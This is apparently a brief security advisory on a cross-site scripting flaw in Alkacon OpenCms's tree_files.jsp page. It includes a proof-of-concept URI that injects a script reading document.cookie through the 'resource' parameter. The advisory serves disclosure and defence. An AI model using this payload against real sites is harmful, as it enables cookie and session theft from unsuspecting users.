|
Alkacon OpenCms 'tree_files.jsp' Cross-Site Scripting Vulnerability
An attacker can exploit this issue by enticing an unsuspecting user to follow a malicious URI. The following proof-of-concept URI is available: http://www.example.com/opencms/opencms/system/workplace/views/explorer/tree_files.jsp?resource=+*/+alert(document.cookie);+/*+/ |
|
|
Privacy Statement |